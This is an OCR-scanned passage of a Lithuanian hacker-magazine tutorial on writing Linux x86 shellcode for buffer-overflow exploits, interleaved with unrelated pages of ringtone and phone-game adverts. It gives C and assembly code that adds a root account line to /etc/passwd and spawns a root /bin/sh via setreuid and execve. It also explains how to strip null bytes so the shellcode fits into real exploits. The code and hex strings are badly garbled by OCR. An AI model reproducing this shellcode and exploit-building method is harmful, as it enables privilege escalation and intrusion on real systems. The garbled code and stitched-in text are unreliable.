PAŽEIDŽIAMUMŲ, TAČIAU MIELAI PAMOKINSIU SUDARINĖTI P 
NEATSIEJAMĄ BET KOKIO SPLOITO DAL| — SHELL-KODUS. 


Iš kur imami shell-kodai 
Mokomės savarankiškai rašyti shell-kodus 


[Kaip veikia eksploitas] Atlikime nedidelį eksperimentą. Su 
tekstų redaktoriumi atsidaryk bet kokio eksploito (žadančio dau- 
gybę visokių gardybiu, tokių, kaip, pavyzdžiui, root shellą nuto- 
lusioje mašinoje) išeities tekstą ir jame surask nesupranta- 
miausią kodo fragmentą. Ten toks beveik garantuotai bus: žiū- 
rek atidžiau, ir tu jį rasi. Greičiausiai tau į akis kris keletas 
nesuprantamų ir tarpusavyje niekaip nesusijusių simbolių ei- 
lučių. Savotiška šešioliktaine forma pateiktų baitų seka, to- 
kia, kaip ši: 


char sholkode] 
"33409 83We9 Kebi ee d9 74 24 VIA N5b NAT 73 VI 3 Ba" 
dd? Ve7V83 ebaleve2N4NbHNOa Ya d beviOvas" 
"NedyBeKbb de Nkb XI 727 Ie BOA ANSINIbWABNO AN" 
40343549846 T vd2484 4031 L03V35 346730 W62423404" 
447454a0 5 dAx9 747506 ša 248674 he O he" 
Vo veb 367463 kad KObW57481486Pa B Ka5 Va 7 dB" 
"va5 bė 9689 403437 kal kb 03 VAS VBPV67"; 


Tai ir yra tas pats shell-kodas, apie kurį kalbėsiu. Kartais jis 
vadinamas bait-kodu, kadangi jis sudarytas iš baitų sekos, ta- 
čiau esmė nuo to nesikeičia. Shell-kodo turinys — toli gražu ne 
gudrus užkeikimas ir ne iš galvos paimti simboliai. Tai pačių 
paprasčiausių mašininių komandų rinkinys, kurios čia yra tokios 
pačios, kokias galima sutikti įprastoje vykdomoje byloje. Pavyz- 
džiu.. aukščiau pateiktas shell-kodas (tam tikra mašininių ko- 
mandų seka) lokalioje Linux mašinoje atidaro 4444 jungti ir su 
Ja susieja shellą. Eksploitas, kuriam pavyks įvykdyti šį shell- 
kodą, hakeriui suteiks pilną priėjimą prie sistemos. 

Su shell-kodu taip pat galima perkrauti sistemą, atjungti IDS 
servisus ir honeypot, tam tikrą bylą išsiųsti elektroniniu paštu ir 
tt., ir pan. Viskas priklauso nuo to, kas būtent aprašyta shell- 
kode. Priversti kompiuterį įvykdyti shell-kodą — eksploito Už- 
duotis. Kaip pavyzdį paimkime paplitusią Buffer Overflow klai- 
dą. Programuotojai labai dažnai neapsižiūri ir netikrina vietoje 
parametrų funkcijoms perduodamų duomenų. Banalus pavyz- 
dys: programuotojas sukuria dinaminį maswa ir išskiria atminti 
100 elementų, tuo pačiu realus elementų kiekis niekur nekon- 
troliuojamas. Tokia įvykių eiga naudinga įsilaužėliams, kadangį 
visi už šio masyvo ribų atsidūrę duomenys patenka į steką, ir 
taip įvyksta taip vadinamas buferio perpildymas. Eksploito Už- 
duotis — perpildyti buferį Ir taip sukeisti grįžimo adresą į tą, 
kuriuo įsikūręs shell-kodas. Jeigu valdymas bus perduotas shell 

kodui, tuomet jis bus įvykdytas. Viskas gana paprasta. 


[Veikimo vieta] Nevertėtų šios medžiagos laikyti eksploitų rašy- 
mo vadovėliu. Šio straipsnio tikslas — praktiškai parodyti shell- 
kodo sukūrimo procesą bei kaip jį galima būtų optimizuoti sie- 
kiant panaudoti realiuose eksploituose. Be abejo, egzistuoja ne- 
mažai resursų (pavyzdžiui, www. metasploit.com), kuriuose gali- 
ma rasti puikių shell-kodų rinkinių, tačiau jų pakanka ne visada. 
Tu nuo pat pradžių turėtum suprasti, kad shell-kodas — tai ma- 
šininių komandų seka (žemiausias ir sudėtingiausias programa- 


vimo lygis), kurios smarkiai susijusios su 


M / i : 
konkrečia procesoriaus ir operacinės sis- 
temos architektūra. Vienoje situacijoje 
veikiantis shell-kodas kitoje bus visiškai 

Kal visų pima nepritaikomas. Štai kodėl svarbu supras- 

LB anas ti, Kas, kur Ir kaip, kad. prireikus, pats 


sugebėtum sukurpti veikiantį shell-kodą 
arba modifikuoti jau egzistuojantį. 

Iš karto noriu perspėti, kad norint ge- 
rai suprasti straipsnyje išdėstyta me- 
džiagą, būtina bent minimaliai išma- 
nyti asemblerį. Tikiuosi, tu atidžiai skai- 
tei įvadinius apie tai rašančius „Coding“ 
straipsnius. nes tokiu atveju problemų iškilti neturėtu ir čia 
pateikta medžiaga pasirodys paprasta bei suprantama. Eks- 
perimentų platforma mes pasirinksime 32 bitų mašiną su x86 
procesoriumi ir įdiegta Linux sistema. Numatau tavo klausi- 
mą: kodėl būtent Linux? Ogi todel, kad daugelis eksploitų skir- 
ta būtent Unix servisams, O tai reiškia, kad ši sistema mus 
domina labiau. Darbui mums taip pat prireiks keleto pagalbi- 
nių įrankių: Netwide Assembler (nasm), ndisasm ir hexdump. 
Daugelyje distributyvų jie pateikiami pagal nutylėjimą, tačiau 
net ir savarankiškas įdiegimas vargu ar sukels sunkumų. Nuo- 
rodas į šiuos įrankius gal! rasti iškarpoje. 


prieš tau arimus 
Žmones, Ir ga- 
liausiai-- prloš. 
pliką pusamžį 
prokurorą. Todėl 
nekvatiak 


[Pavyzdžio dėlei] Shell-kodų paruoštukai paprastai rašomi asem- 
bleriu, Vis dėlto mes visą procesą aptarsim kiek kita tvarka: iš 
pradžių, kad būtų suprantamiau, aptarsime pavyzdžius su C kal- 
ba, o jau po to — analogišką kodą su asembleriu. Aš specialiai 
aptarsiu du visai paprastus pavyzdžius, kad neapkraučiau tavęs 
gremėzdiškomis kodo iškarpomis, iš kurių vis tiek nebus jokios 
naudos. Labai greitai tų suprasi, kad sudėtingesnius veiksmus 
atliekančio shell-kodo kūrimo procesas niekuo nesiskiria. 

Taigi pirmasis pavyzdys. Jis pats paprasčiausias ir jo esmė ta- 
me, kad mūsų nedidelė programa įrašymui atidarys bylą /eto/ 
passwd, į jos pabaigą pridės eilutę „xakep:x:0:0::/:/bin/bashNn“, 
po ko ją uždarys išsaugodama rezultatus: 


žindude <stdio.h> 
žindude < fentl.h > 


moin[) 

char "Kilename = "/etc/passwd"; 

char "line — "xakep:x:0:0::/:/bin/bashNn"; 

int I open; 

f opon = open(ilename, O WRONLY! O. APPENO); 
vel open, Iie, sieninė), 

cosa open) 


ai(0) i: 


Čia pateiktas kodas labai paprastas ir suprantamas, nebent 
išskyrus funkciją open (atidaryti bylą). Konstanta O WRON- 
LY|O APPEND, kuri jai perduodama vietoje parametro, parodo 
tai, kad byla atidaroma įrašymo režime, o nauji duomenys ra- 
šomi į jos pabaigą. 

Dabar aptarsime gyvenimiškesnį pavyzdį — komandų interpre- 
tatoriaus (shello) paleidimą. Čia mes per daug negudrausim: 
mums per akis pakaks standartinio /bin/sh. 
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Su shell-kodu taip pat galima perkrauti sistemą, atjungti IDS 
servisus ir honeypot, tam tikrą bylą išsiųsti elektroniniu paštu ir 
Lt. 


indude <stdio.h> 
main() 


char "name[2]; 
nome[ū] = “/hin/sk"; 
none[t] = NUL; 
setreuid[0, 0); 
8xeve(name[0] name, NULL); 
tos pats, kas ir erecve(“/bin/sh“, (*/bin/sh“,NULL),NULL) 


Čia komanda setreuid(O, 0) naudojama tam, kad būtų vyk- 
doma su root teisėmis (jeigu tai įmanoma). execve(const char 
filename, char const argv [], char const envp[]) — tai pagrin- 
dinis sisteminis iškvietimas, kuris įvykdo bet kokias vykdo- 
mas bylas ir skriptus. Jam perduodami trys parametrai: file- 
name — pilnas kelias iki vykdomos bylos, argv/] — argu- 
mentų masyvas, envp[] — „raktas=reikšmė“ formatu patei- 
kiamų eilučių masyvas, kurios prieš bylos paleidimą konfigū- 
ruojamos kaip šios vykdomos bylos aplinkos kintamieji. Abu 
masyvai turi baigtis nuliniu (NULL) elementu. 


[ĮAsembleris — beveik paprasta] Dabar, kai mes jau turi- 
me keletą su C sukurtų pavyzdžių, pabandysime juos pavers- 
ti į gryno asemblerio kodą. Tu turėtumei žinoti, kad sistemi- 
nės funkcijos iškviečiamos su specialiu pertraukimu, kuris 
nuskaito registre EAX pateiktą funkcijos numerį ir ją įvykdo. 
Funkcijų numerius galima rasti byloje /usr/include/asm/ 
unistd.h. Pavyzdžiui, eilutė „Adefine NR open 5“ reiškia, 
kad funkcijai open() priskirtas identifikacinis numeris lygus 
5. Analogiškai surandami likusių funkcijų numeriai: exit() — 
1, close() — 6, setreuid() TO, execve() — 11. Iš esmės to 
pakanka norint parašyti veikiančią programą. 
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Praktiškai bet kokiame eksploite gelima rasti keletą shell-kodo eliučių 


Melodijų TOP 10 


1 MINO 8 VILIJA = Vivo par lai S410102094 | 6 MINO - Be meilės mirt gal SetO102134 
Ž VILA - Mylėk, 5410102168 | 7 LT UNITED - We Are the Winners 5410102200 
V RAKETA. Padarys mano Saiotozias | 4 VUDIS- Žodžiai S210102181 
* WA Daina ne daina: Suiotozias | 9 BENASSI BROS - Every Singie Day 5410102042 
69 DANGUJE -9 dangu 5410102107 | 10 VUDIS- Kur bebūtum tu S410102106, 


Lietuviškos 


Spalvoti paveikslėliai 


4 Fasioio1680 


Populiarios 
TATU-Friend or Foo 


5410102172 


KASTANEDA - Pavasaris viską pakeis 5410102236 | ŽAS - Euroliga 5410101936 
V-BUMER 2 Sato1o2234 | A. MAMONTOVAS -Liūdesio anasias: —E410102170 
SERGEJ SKNUROV „Svoboda (BUMER2) 5410102227 | MOKINUKĖS - Mažyti mstas sa1orozisa | | Psaiojoiasa 
18 DANGUJE - Ašaros. 3410102241 | MANTAS - Gyvenam karą atojozaTa 
GMENSTEFANI- Grash Šsto1ozz3s | TABU -Maža šieiė žanorojoss 
ŠIAKRA 8 W.JEAN-Kios Dante ——5610102242 | KASTANEDA -Ka G. tu darai žaio1o1a58 
[ias iR SMONA Kai tu sėja S410102247 | FUNKY «Tarp krentančių žvaigžūlių — 8410101963 
DEPECHE MODE - A Pain That !'m Used To 5410102249 | MANGO - Karštas bučinys 5410101965 PSAI0KEIA0S 
SEPTEMBER = Doosn't Mater 3a1o102246 | MA Sapnai šanoro1a6T, 
ERAIG DAVID - Unbelevabie Si1o102244 | TABŲ = Jausmas avojo1688 


Ž. ŽVAGULI je nėra 
E. KUČINSKAS- Lai. lai angelai 


M410101 
S410101760 


FSsi0101989 || FS410101412 


im 


£5410101705 


] 

Br | 
Fsa1o101234 

B 
F5410101870 

- — 

p 

Ti 
Fsa10101016 


>> 


FS410102000 


* 
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NES BUUNTGoadSye M Too SKOREZS | AVARIJA -Mjonai bčia EU 
ŠIGASABĖS Ugis StABio212 | DONAL DA Nukyto ak žinos 

ARASK Ars strorozisa | YVA Tik aš kiai ET 

WALTERS 4 KAŽA - Feeling this Touch | 5410102136 | ONSA- Don't Let Me Die 5410102067 

SiARRA Gan Bo siais | aeLNAI Ac Tau Siras PaiioDiS 
ROS RANAZZOTAI La Monta Vi SRO GECTONA Mei ania aro 

"MEBLAGKEYEBYPEAS "My iumos —SIDR0216 YVA Dana Redains ETO 

SIGABABES "Pus he uo stioazno | AuseRuirE "Day orig ašiai? 

[JAMES BLUNT - High 3410102037 | DELFINAI- Negai 5410102188 

GRKLAZ -Bai aansioa ŽAS Mariana ETUTA 


| UANES -La Camisa Negrą 
MES BLUNT -Yaure Beauti'ui 


SA10101964: 
S410101875 


THE RASMUS 
First Fay In My.Lite. 


5410101482 


[ROBBE WILLIAMS -Tripping 
OB THOMAS -Lonely no More: 


UauiGO -Grarary Us SUAUTOTTOS | Funerai Song EI 
POW ION "ave A Mies Bay Eaiotonois | Guiy BAToTIS 
TOLB -Kappans Ai The Time BKIDIOISTS | Na Fear ET 
UNK PARK One Step Closer SVA0102048 | Sali Away SAtOT02150 


Sa10102035 
SA4O101838 


Just Lose lt 3410101320 


F541010252 


LZ 
FS410101488 


LB 


F5410101977 


5 


FS410101166 


2 


FS410101986 


1 


FS410101635 


FS410101503 


SEXY POKER 2005 


B 


NEW YORK NIGHTS: 
SUCCESS IN THE CITY" 


STREETBALL 
EXTREME 


MOBILE FORCE 2 


Like Toy Soldiers 5410101448 FS410101279 TT F5410101208 PS410101168 FSA10101215 
She WI Be Loved 5410101173 | Lose Yourself sa10101137 
Sunday Moming Sa1o101385 | Mockingbrd Sa1o101754 - 
Tis Lovo Sano1o1042 | Mosh E410101275 | Ž 
Kardai To Breathe SAA0101476 | Stan SaAo101470 L 
usi Gel Out S410101703 | The Way Am. Sano101043, Easioiossa | PB4I01D1296 taštanios 
MONOTONINĖ POLIFONINE "WAPIGPRS | 2Lt —-MELODIJOS MONOTONINĖS:| | | 1, Rašyk žinūtų su kodu, Pvz. FS2107 2Lt 
1 Rašyk žinutę su: M ir kodu 1. Rašyk žinių su: P ir kodu ei oou K ESRT || 2 Siųsk numeriu: Wanopas 
pro Ap = SAMSUNG, MOTOROLA ||| | NOKIA, SIEMENS: su WAP nustatymas, SAMSUNG: D100. E1 ' 1 
augi M54101020 a:OGOX draugui PB410102084 370699XXXXX 1EMENS, sonivEnicSsoNi J | Ts00 Kaoo x4t. 700 oo PG, MOTOROLA, Ch Eu, Čašo sONY ERICSSON. 
2. Slųsk numerių: 2. Siųsk numeriu LG. PANASONIC satyra T 302. Ta06 Ta10.Ta12 TAl6. 17 208 250 7 


Paveikslėliai su tekstu JAVA žaidimai 


WAR OF THE WORLDS 


 panluga tinka loklems patiems telefonų modeliams, kaip r spalvotų paveiksielių 


stiniojmia | Taaieiojoaa | Tsaidiojoos | T8410101034 
| "ką ž 1 
-Ą4 el asatotovias Asetonorta? Asaiovori?i JBaiatoni 
mA AA pčicas Iayvendii savo stojo: || Sunrinko komandos Iš Tai židimas papai tos 
Džanis ALL apelovank asla mito an kai day 
Kit pažiai Žaikis || Vonkos Tiinaodemu, || va inokokrplinio r 
Kieminiirka pamatys || Kad pesaktum sėkmę Šiai komanda Ir šaiou iekvienaiyo par 
Kalanta i ki kometa" Ie ave kiavnge, 
vonių dera aiūkrą || Aomand ai iki ži: anaeuos vie stutea r 
Žirasi angos grupę 
Teumioiooa | Tesieioias Taaieiomos | Taaisiooės krapė Side eme iai 
* 2 p a BS Rea Zi 
KN T v o jos 20 r - m 
TS410101032 —TS410101035 Ake iis RC ios Minos - 
Tsuaiioes TsaiGGioS7  Tsaioioioas | TSaio101008 eks UA 
T katy žinutę su kodu: Pvz TSSITO1OT6 TEKSTAS 2 Le || || T. Rašykžinię su kodu: Paz ISI 0AUT7AE imugu JS3 010188 70690 10 
2 Siu numeri ins 1 OMNITEL ar BITĖ, sijek numeriu: 1390 Jei prikausai TELE2,skjsk numeri Maras 


WAP/GPRS 


Įsitkinkite, kad telefone įjungta WAP/GPRS paslauga. Ją užsisakykite paskambinę savo operatorui: TELE2 - 117, OMNITEL - 1566, 
BITĖ GSM - 1501. Pasiauga tinka visiems OMNITEL, BITĖ LIETUVA, TELE2 klientams, išskyrus PILDYK ir MAŽYLIO vartotojus. 
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sedion data 
filename db "/att/posswd“, 0 
line db xakep:x:0:0::/-/bin/bashi,Ox0a 
sedion ex! 
global stu 
start: 
; open[filename, O WRONLY | O APPEND) 


mov enx, 5 

mov ebx, | filename. 
mov e, 1025 
int 080 


mov ebx, | 60K 
; writelt open, line, 24) 
mov 60,4 
mov 60, line 
mov edx, 24 
int 0480 
doselį open) 
mov e0X, 6 
int 0480 
ait(0) 

mov e, | 
mv eb, 0 
int 0580 


Kaip žinia, asembleriu parašyta programa paprastai suside- 
da iš trijų segmentų: duomenų, kuriame aprašomi kintamie- 
Ji, kodo, kuriame yra programos instrukcijos, ir steko seg- 
mento, kuris yra speciali duomenų saugojimui skirta atmin- 
ties sritis. Mūsų pavyzdyje naudojami viso labo du segmen- 
tai; duomenų ir kodo, kurių pradžią žymi valdymo operatoriai 
section „data ir section „text. Duomenų segmente apibrėžti 
du kintamieji: name ir line, kurie yra eilutės tipo, sudaryti iš 
baitų rinkinio (matai aprašyme panaudotą žodelį db?). Kodo 
segmentas prasideda nuo įėjimo į sistemą taško apibrėži- 
mo: global start. Ši konstrukcija parodo, kad programos in- 
strukcijas derėtų pradėti vykdyti nuo žymės start. Viskas I0- 
giška: po šios žymės iš tiesų eina reikiamų funkcijų ir proce- 


[Istepalocalhost shellcode]s gec -9 shelli shelli.< 
[stepėlacalhost shellcode]s „/shelli 


h-3.088 cat shelii.c 
include <stdio,h> 

Įrainė) 

[ 

har *name[2]; 

ame[6] = "/bin/sh" 

amei1] = NULL: 

Ietreuiato, 

xecve (name[0],nane, MULLI: 

14 PWAE ADNHE, BPH X execve(" /bin/sh“, ("/bin/sh" „NULLJ,NULLI 
b 


4005 I 


Komencų Interpretatonų paleidžiant! G programa 


dūrų iškvietimai. Taigi jeigu mums reikia iškviesti funkciją 
open), tai į EAX registrą įkeliamas jos numeris — 5. Po to 
funkcijai perduodami parametrai. Apskritai šnekant, tai gali- 
ma padaryti kiek kitais būdais, tačiau mūsų atveju naudoja- 
mas paprasčiausias, įdarbinantis registrus EBX, ECX, EDX. | 
EBX patalpinamas pirmasis funkcijos parametras, t. y. eilu- 
tės name pradžios adresas, kur saugomas kelias iki atidaro- 
mos bylos ir jos pavadinimas bei užbaigiantis nulis (daugelis 
funkcijų reikalauja, kad eilutės tipo kintamieji užsibaigtų bū- 
tent nuliniu baitu). O į ECX registrą įkeliamas antrasis para- 
metras, simbolizuojantis bylos atidarymo režimą (konstanta 
O WRONLY|O APPEND skaitmeniniu pavidalu). Dabar, kai re- 
gistruose patalpintos reikiamos reikšmės, galima iškviesti 0x80 
pertraukimą. Jis iš EAX registro nuskaito funkcijos numerį ir ją 
įvykdo su atitinkamais parametrais. Po to pratęsiamas pagrin- 
dinės programos vykdymas, kur funkcijoms write(), close() ir 
exit() iškviesti naudojamas tas pats mechanizmas. 

Dabar aptarkime antrąjį pavyzdį. 


section „data 
name db "/bin/s', 0 


sechion „lex! 
global star 
start: 


„seteuid(0, 0) 
mov E0X, 70 
mov ebx, 0 
mov 60, ū 
int 0480 


; ekecve(“/bin/s,["/kinyh", NULŲ, NULI) 
mov e0X, 
mov ebk, 
push 0 
push name 
mov 60, tSP 
mov od, 0 
int 0580 


tame 


Jeigu nepaisysime funkcijos execve() iškvietimo, didžioji ko- 
do dalis analogiška ankstesniam pavyzdžiui. Tie patys seg- 
mentai, tas pats funkcijos setreuid() iškvietimo principas. 
Problema tik tame, kad vietoje antrojo execve() paprogra- 
mės parametro perduodamas masyvas iš dviejų elementų. 
Tokį parametrą priimta perdavinėti per steką, į kurį iš pra- 
džių patalpinamas nulis (push 0), o po to eilutės name pra- 
džios adresas (push name). Parametrai neatsitiktinai per- 
duodami atvirkštine tvarka. Stekas naudoja LIFO principą 
(paskutinis atėjai — pirmas išėjai), todėl išgaunant duo- 
menis iš steko iš pradžių bus gautas kintamojo name adre- 
sas ir tik po to — nulis. Būtina pasirūpinti tuo, kad paprog- 
ramė žinotų, kur ieškoti šių parametrų, čia jai labai padės 
specialus ESP registras (Stack Pointer santrumpa). kuris vi- 
sada rodo į steko viršūnės adresą. Viskas, ką mums reikia 
padaryti, — nukopijuoti ESP registro turinį į ECX registrą, 
kuris paleidus 0x80 pertraukimą bus apdorotas kaip antra- 
sis funkcijos parametras. 


[Kodėl gi ne?] Gautas asem- 


Reikia! Įranbiai: k i 
Rėda In iaukgus  DIBNS kodas visiškai darbingas. 
BPNeU Jį nesunkiai galima sukompi- 
Vsiunė nebo liuoti su nasm'u, paleisti ir net 
aa 8“ su šešioliktainės sistemos re- 


daktoriumi peržiūrėti vykdomą 
bylą, t.y. gauti paruoštą shell- 
kodą. Vienintelė problema: iš 
tokio shell-kodo bus mažai 
naudos. Abi programos naudo- 
ja nuosavus duomenų segmen- 
tus, kas iš jų pilnai atima gali- 
mybę jas įvykdyti kitos programos viduje. Tai reiškia, kad eks- 
ploitas reikiamo kodo negalės įterpti į steką ir jį įvykdyti. 

Būtent dėl to kitas mūsų žingsnis bus programos optimizavi- 
mas, kad ji veiktų nenaudojant duomenų segmento. Čia mes 
šiek tiek pagudrausim ir pasinaudosime vienu metodu, pagrįstu 
asemblerio instrukcijomis jmp (pereiti į žymę) ir call (iškviesti 
procedūrą). Abi instrukcijos realizuoja perėjimą į reikiamą pro- 
gramos vietą, tačiau call, be viso kito, į steką įkelia grįžimo 
adresą. To reikia tam, kad užbaigus procedūros vykdymą būtų 
galima grįžti į pradinę programos vietą ir pratęsti normalų jos 
vykdymą. Aptarsime šio metodo esmę remdamiesi pavyzdžiu: 


SheW kodų Kolekcijos Ir 
susijusį dokumentacija 
Metasplol.com 
packetstormsėcutHy. CO 
shelode 
Wwusholcode.0rB: 


įmp Mo 

onė. 

pop ebx 
piogramos tekstas] 
Mo: 

tall one 

db eilutė“ 


Pačioje programos pradžioje realizuojamas perėjimas į žymę 
two, už kurios yra procedūros one iškvietimas. Iš tiesų jokios 
procedūros nėra, vienok yra dar viena žymė tokiu pavadinimu, 
kuriai Ir perduodamas valdymas. Šiuo metu į steką įtraukiamas 
grįžimo adresas, t.y. po call einančios instrukcijos adresas, kas 
mūsų atveju yra baitų eilutė — db 'string'. Taip išeina, kad tuo 
metu, kai pradedamas žymės one apdorojimas, į steką bus 
įkeltas eilutės pradžios adresas. Mums telieka ją išgauti ir pa- 
naudoti savo nuožiūra. Pabandysime tuo pasinaudoti realioje 
programoje: tam modifikuosime mūsų antrąjį pavyzdį. Kad bū- 
tų patogiau, pavadinkime jį shell.asm, kadangi toliau dirbsime 
tik su juo. 


BITS 32 


setievid(0, 0) 
mov eo, 70 
mv eb, 0 
mw ex, 0 
im 0x80 


įmp wo 
One: 
pop. ebx 


ece("/iryst",Į“/bin/sh“, NULIŲ, NU) 
mv e0x, II 


push 0 
jush  obx 
mov 60, SP 
mov edx, 0 
int 080 


Mo: 
tall one 
db /ir/sk“, 0 


Kaip matai, čia jau nėra jokių segmentų. Eilutė /bin/sh, kuri 
anksčiau buvo saugoma duomenų segmente, dabar išgauna- 
ma iš steko ir įkeliama į registrą EBX. Be to, buvo pridėta nauja 
direktyva BITS 32, atsakinga už optimizavimą 32 bitų proceso- 
riams. 

Iš esmės buvo galima pasielgti ir kiek kitaip: savarankiškai į 
steką įkelti eilutę ir po to ją išgauti, panaudojant steko viršūnės 
rodyklę ESP Šį metodą panaudosime su eilute „helio, world!“: 


push word 0x0021 
push 0x6467261 
push 0x77202c6 
push Oxbchc6568 
mov eb, 6P 


Eilutė į steką įtraukiama nuo galo: iš pradžių eina |n! (šešiolik- 
tainis kodas — 0x0a21), po to dlro (0x646c726f), toliau w „0 
(0x77202c6f) ir Ileh (Ox6c6c6568). Galiausiai ESP registro 
reikšmė (eilutės pradžios adresas) įkeliama į EBX. Šaunu? Šis 
metodas kur kas efektyvesnis, kadangi smarkiai sutrumpina 
shell-kodą, tačiau jis ne toks patogus. 


[Pirmasis shell-kodas] Dabar, kai mes išmokome apseiti be 
duomenų segmento, galima pradėti savo pirmojo pilnavertiško 
shell-kodo kūrimą. Tam iš pradžių reikia sukomoiliuoti su asem- 
bleriu sukurtos programos išeities tekstą: 


$ nasm shellasm 
Ir gautą vykdomą bylą peržiūrėti su programa hexdump: 

$ heidump -C shell 
Matai pateiktą ekrano vaizdą? Iš esmės tai ir yra shell-kodas, 
tik prieš tai jį reikia transformuoti į atitinkamą pavidalą. Tam 
prieš kiekvieną bai išyk simbolius |x ir be tarpu įtrauk į sim- 


bolių masyvą. Patiki jo veikimą galima su štai tokia nesudė- 
tinga programa: 


char code[] 

Agbš dė 00000 Ybb 000000 KO 6? 0000 WOO VLd" 
A5BO 691500 OLD Sb 68 Ob 000000 B 000 VO" 
AX00453489 We] bo 0000 VO cd BO koB ab NK" 
Ay2Nx626P ba 273 LBO"; 


main() 


ii (se; 
(n)sell = Ode; 
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shell(); 


S gec-o shell.c 
S /shell.c 


Viskas veikia! 


ĮTie piktieji null-baitai] Skubu tave nuliūdinti. Nepaisant 
to, kad shell-kodas nenaudoja duomenų segmento ir net 
veikia testavimo programos viduje. panaudoti jo realiuose 
eksploituose kol kas negalima. Dėl to kalti nuliniai baitai 
(1x00), kurių shell-kode tiesiog pilna, Daugelis Burfer Over- 
flow ir panašių klaidų susiję su darbo su eilutėmis funkcijų 
(stropy(), sprintf(), gets(), streat() ir t.t.) panaudojimu. Jeigu 
pabandytume shell-kodą panaudoti vienam iš tokių pažei- 
džiamumų, perpildyti buferį ir įterpti kodą su nuliniais bai- 
tais, tai nieko gero iš to neišeis. Sutikusi nulinį baitą, funkci- 
ja pagalvoja, kad ji sutiko eilutės pabaigą, ir neskaito liku- 
sios shell-kodo dalies. 

Hakeris privalo visomis jėgomis vengti tokios situacijos, kuomet 
shell-kode atsiranda nuliniai baitai. Būtent tuo mes dabar ir 
užsiimsime. Idėja paprasta: surasti tuos kodo fragmentus, ku- 
riuose atsiranda nuliniai baitai, ir pakeisti juos taip, kad shell- 
kode nebūtų [00 kombinacijų. Patyręs programuotojas dauge- 
liu atvejų gali lengvai nustatyti, dėl ko mašininiame kode atsira- 
do nuliai, tačiau mums, naujokėliams, prireiks disasemblerio 
pagalbos. Pasinaudosime ndisasm: 


$ nasm shell.asm 
S ndisosm shell asm 


Įvykdžius šią komandą, | ekraną bus išvestas disasembliuotas 
programos kodas. Pirmasis stulpelis — instrukcijos adresas, jis 
mums nėra ypatingai svarbus. Antrame stulpelyje yra mašini- 
nės instrukcijos, kurios čia tokios pačios, kaip ir peržiūrint vyk- 
domą bylą su hexdump. Trečiame stulpelyje kiekvienai mašini- 
nei instrukcijai pateiktas asemblerio ekvivalentas. Tik matyda- 
mi asemblerinį kodą mes galime spręsti, iš kur shell-kode atsi- 
rado nuliniai baitai. 

Po greitos peržiūros tampa aišku, kad daugelis NULL baitų 
susiję su instrukcijomis, kurios valdo registro ir steko turinį. 
To ir reikėjo tikėtis. kadangi mes dirbame 32 bitų režime, 
atitinkamai kiekvienam skaičiui išskiriami 4 atminties baitai. 
Tuo tarpu mes operuojame skaičiais, kuriems užtenka ir vie- 
no baito. Pavyzdžiui, pačioje shell.asm programos pradžioje 
yra instrukcija „mov eax, 70“ (į eax registrą įkelti skaičių 70). 
Tiek su ndisasm, tiek ir shell-kode matyti, kad ši instrukcija 


-1$ nasm shell2.asm 

-1$ hexdump -C shell2 
bo 46 31 db 31 c9 
50 53 89 el b0 60b 
62 69 6e 2f 73 68 23 


[stepalocalhost 
Istepėlocalhost 
806000006 31 60 
600600010 43 07 
60000020 ff 2f 
00000029 

[Istepėlocalhost -1$ 


Po papildomų veiksmų nuliai baitai dingo 


cd 80 eb 16 5b 31 c0 88 
31 d2 cd 80 e8 eb ff ff 


pateikiama kaip „B8 46 00 00 00“. Beje, B8 — tai mašini- 
nės komandos mov ax atitikmuo, o 46 00 00 00 — skaičius 
70 šešioliktainėje sistemoje, papildytas nuliais taip, kad už- 
imtų 4-is baitus. Analogiškai susidaro ir dar daugiau NULL 
baitų. 

Laimė, išspręsti šią problemą paprasčiau nei paprasta. 
Pakanka prisiminti, kad 32 bitų registrus (EAX, EBX ir ki- 
tus, kurie prasideda raide E) galima išskaidyti į mažesnio 
dydžio registrus. Pažiūrėk į iliustraciją ir tau iš karto pasi- 
darys aišku, kad mums niekas netrukdo dirbti su dviejų 
baitų registru AX bei su mažesne ir vyresne jo dalimis - 
AL ir AH. Pastarųjų dydis yra viso labo vienas baitas — 
kaip tik tai, ko mums reikia. Taigi tereikia „mov eax, 70“ 
pakeisti į „mov al, 70“ ir t.t. Svarbu pasirūpinti tuo, kad 
likusioje registro dalyje nebūtų šiukšlių. Greitai Ir efekty- 
viai viso registro reikšmę nunulinti galima pasinaudojus 
logine funkcija „išskiriantis arba“. Taigi „xor eax, eax“ Nu- 
nulins EAX registro reikšmę. 


[Problemos tuo nesibaigia] Net ir po šių pakeitimų snell-ko- 
de vis tiek yra nulinių baitų. Derintuvas rodo. kad visų bėdų 
šaltinis — instrukcija įmp: 


1500 
0000 add 


įmp 0x29 
[bx-si] al 


Čia yra viena gudrybė: vietoje įprastinės komandos įmp reikia 
panaudoti artimo perėjimo instrukciją — įmp short. Nedidelėse 
programose, kurių struktūra paprasta, šios instrukcijos yra vi- 
siškai lygiavertės, tačiau antruoju atveju mašininiame kode nė- 
ra nulinių baitų. O juk mums būtent to ir reikia. 

Atrodytų. viskas paruošta. Shell-kodas turėtų būti idea- 
Jus. Tačiau ne! Jame kaip ir anksčiau vis dar lieka vienas 
vienintelis ir niekšiškas null-baitas. Jis yra pačioje mūsų 
shell-kodo pabaigoje ir ten atsiranda todėl, kad eilutė, 
kurioje nurodytas kelias iki interpretatoriaus (/bin/sh', 0), 
baigiasi nuliu. Kaip minėjau anksčiau, šis nulis reikalin- 
gas teisingam programos veikimui (funkcijai execve(J). Kad 
ir kaip norėtum, tiesiog imti ir jį pašalinti negalima. Vis 
dėlto čia galima pasinaudoti dar viena gudrybe: kompilia- 
vimo etape vietoje nulio galima nurodyti laisvai pasirinktą 
simbolį ir nuliu ji paversti tik programos vykdymo metu. Tai 
daroma maždaug taip: 


sulf 


Jmp short 
code: 


ų ss 


| 1o|-F1ulumM-K. I io7| 
ĮC „PSlA||. 1pM-XKbb| 
Įb/bin/shžį 


džios adresas 
bar randasi registre ESI 
xoi | 60X, 60X 
unulinam EAK registrą 
mov byte [esi + 171al 
ucjam 18 simbolių (numeracija nuo nulio) 


en įrašome nulį (EAN registras visškai lygus 
ruliui) 


Iutė pavirs į “This 5 my stringO“ 


code 
This is my string" 


Dabar ši metodą pritaikysime programoje shell.asr: 


1 0x80 


np short Mo 


pop eb 


6(“/Ain/sh", ["/hin/sh“, NULŲ, NUU) 


Sukompiliavę programą įsitikiname, kad nulinių baitų daugiau 
nėra. Derėtų pastebėti, kad problemos iškilti gali ne tik dėl 
nulių. Specialūs simboliai (pavyzdžiui, eilutės pabaigos sim- 
bolis) kai kuriais atvejais taip pat gali tapti shell-kode atsiran- 
